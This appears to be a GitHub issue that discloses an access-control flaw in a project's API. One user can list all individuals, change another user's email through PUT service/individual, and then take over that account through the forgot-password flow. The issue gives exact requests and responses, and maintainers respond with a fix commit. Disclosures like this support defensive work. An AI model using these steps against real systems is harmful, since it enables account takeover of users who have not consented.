Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerability: Individual can reset password of another individual #618

Closed
vikstrom opened this issue Feb 16, 2024 · 2 comments
Closed

Vulnerability: Individual can reset password of another individual #618

vikstrom opened this issue Feb 16, 2024 · 2 comments
Assignees
@albinpa
Labels
bug Something isn't working high-priority

Comments

@vikstrom
Copy link

Summary

User A is able to list all other users in the organisation. by requesting GET service/individuals.
The response lists all individuals in the organisation, including email, phone and id.
Using id...

"individuals": [ {"id": {ID}, ...} ]

...it's possible to make a request to PUT service/individual and update both phone and email for any user. User A is able to update User B's email to one that User A controls.

It's then a simple matter of starting a Forgot Password flow PUT onboard/password/forgot providing that email address and using the link to reset the password. User A will now have full control over User B.

Detailed

  1. Login as User A
POST onboard/individual/login

Request body:

{
  "username": "user_a@fakemail.com",
  "password": "usera"
}
  1. Authenticate with the bearer token to list all individuals
GET service/individuals?offset=0&limit=10

Response:

{
    "individuals": [
        {
            "id": "65ce250da82fd094cbc922d3",
            "externalId": "",
            "externalIdType": "",
            "identityProviderId": "",
            "name": "User B",
            "iamId": "8206b93b-97a8-413a-99ba-a6c8138a849f",
            "email": "user_b@fakemail.com",
            "phone": "123456789"
        },
        {
            "id": "65ce2534a82fd094cbc922d5",
            "externalId": "",
            "externalIdType": "",
            "identityProviderId": "",
            "name": "User A",
            "iamId": "46b08a7f-43a8-4e7c-a38e-b23204e0198a",
            "email": "user_a@fakemail.com",
            "phone": "123456789"
        }
    ]
}
  1. Now we are able to update User B. Using the bearer token for User A.
PUT service/individual/65ce250da82fd094cbc922d3

Request body

{
  "individual": {
    "phone": "1337",
    "email": "our_email@fullcontrol.com"
  }
}

Response

{
    "individual": {
        "id": "65ce250da82fd094cbc922d3",
        "externalId": "",
        "externalIdType": "",
        "identityProviderId": "",
        "name": "User B",
        "iamId": "8206b93b-97a8-413a-99ba-a6c8138a849f",
        "email": "our_email@fullcontrol.com",
        "phone": "1337"
    }
}
  1. Request a Forgot Password link.
PUT onboard/password/forgot

Request body

{
  "username": "our_email@fullcontrol.com"
}
  1. Click the link sent to the email address and reset the password.
    You are now able to login as User B.
@georgepadayatti georgepadayatti added bug Something isn't working high-priority labels Feb 16, 2024
albinpa added a commit that referenced this issue Feb 16, 2024
@albinpa
Fix: #618 Vulnerability: Individual can reset password of another ind…
ca308fc 
…ividual
@kashishmalik
Copy link

Checked the API with Albin

@georgepadayatti
Copy link
Member

Checked the API with Albin

Have you signed-off on this change? If yes, could you make a release?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@albinpa albinpa

Labels
bug Something isn't working high-priority
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@vikstrom @georgepadayatti @kashishmalik @albinpa